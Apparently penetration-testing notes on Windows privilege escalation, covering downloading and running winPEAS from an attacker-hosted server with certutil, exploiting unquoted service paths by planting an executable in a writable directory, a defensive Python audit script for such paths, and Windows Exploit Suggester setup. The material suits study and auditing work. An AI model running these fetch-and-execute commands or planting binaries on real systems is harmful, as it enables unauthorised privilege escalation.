Automated Tools

WinPEAS

Attacker Machine
python3 -m http.server 80
Target Machine (Windows)
certutil -urlcache -f http://10.1.1.4/winpeas.exe winpeas.exe
.\winpeas.exe

What To Look For

  • Applications/Services that are running as Admin whose binary path is unquoted and contains spaces.

Example Result from winPEAS
  • An unquoted service path means the service is vulnerable to a malicious executable being planted in one of the directories along the path

  • Example:

    • "C:\Program Files (x86)\Wise\Wise Care 365\BootTime.exe" - Quoted

    • C:\Program Files (x86)\Wise\Wise Care 365\BootTime.exe - Unquoted

  • Windows tries each prefix of the path that ends before a space as an executable, in order, before reaching the real binary:

    • C:\Program.exe

    • C:\Program Files.exe

    • C:\Program Files (x86)\Wise\Wise.exe

    • C:\Program Files (x86)\Wise\Wise Care.exe

  • We can use that vulnerability to insert a malicious executable file into a directory along the path where we have write access, such as C:\Program Files (x86)\Wise\
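The same search-order logic is what a defender audits for. The script below is an added example (not from winPEAS or the original notes): it takes name/path pairs of the kind `wmic service get name,pathname` or `sc qc` prints, flags services whose image path is unquoted and contains spaces, lists the intermediate executables Windows would try in order, and reports the directories whose ACLs need checking. The service entries are constructed sample data; the function names are my own.

```python
import ntpath
import re

# Constructed sample data: (service name, ImagePath) pairs as you would get
# from "wmic service get name,pathname" or "sc qc <service>".
SAMPLE_SERVICES = [
    ("WiseBootAssistant", r'"C:\Program Files (x86)\Wise\Wise Care 365\BootTime.exe"'),
    ("UnquotedSvc", r"C:\Program Files (x86)\Wise\Wise Care 365\BootTime.exe"),
    ("NoSpaces", r"C:\Windows\system32\svchost.exe"),
    ("QuotedWithArgs", r'"C:\Program Files\Vendor\agent.exe" -service'),
]


def is_unquoted_with_spaces(image_path: str) -> bool:
    """True when the path is not wrapped in quotes and contains a space."""
    p = image_path.strip()
    return not p.startswith('"') and " " in p


def search_candidates(image_path: str) -> list:
    """Executables Windows would try, in order, before the real binary.

    For every space in the path, the text before that space plus ".exe" is a
    candidate. Assumes image_path is the bare executable path (no arguments).
    """
    return [image_path[: m.start()] + ".exe" for m in re.finditer(r" ", image_path)]


def directories_to_check(candidates: list) -> list:
    """Parent directories of the candidates, de-duplicated, in search order.

    A low-privileged account with write access to any of these can plant a
    binary that the service would launch, so these are the ACLs to review.
    """
    seen, dirs = set(), []
    for c in candidates:
        d = ntpath.dirname(c)
        if d not in seen:
            seen.add(d)
            dirs.append(d)
    return dirs


def quote_image_path(image_path: str) -> str:
    """Remediation: the fixed ImagePath value, with the executable quoted."""
    return f'"{image_path.strip()}"'


def audit(services: list) -> list:
    """Return one finding per service with an unquoted, space-containing path."""
    findings = []
    for name, path in services:
        if not is_unquoted_with_spaces(path):
            continue
        cands = search_candidates(path.strip())
        findings.append({
            "service": name,
            "image_path": path.strip(),
            "candidates": cands,
            "check_acls_on": directories_to_check(cands),
            "fixed_image_path": quote_image_path(path),
        })
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_SERVICES):
        print(f"[!] {f['service']}: {f['image_path']}")
        for c in f["candidates"]:
            print(f"    would try: {c}")
        print(f"    review write access on: {f['check_acls_on']}")
        print(f"    fix ImagePath to: {f['fixed_image_path']}")
```

Only the bare executable path is handled; if an unquoted ImagePath also carries arguments, strip them before calling `search_candidates`.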

Setting up Windows Exploit Suggester

  1. Gather System Info from the Target machine and save it to a file

systeminfo > <SYSTEMINFO_FILE>
  2. Download Windows Exploit Suggester

  3. Update the Database

./windows-exploit-suggester.py --update
  4. Install Dependencies

pip install xlrd --upgrade
curl https://bootstrap.pypa.io/get-pip.py -o get-pip.py; python get-pip.py
  5. Run Windows Exploit Suggester with the Systeminfo

./windows-exploit-suggester.py --database <XLSX_FILE> --systeminfo <SYSTEMINFO_FILE>
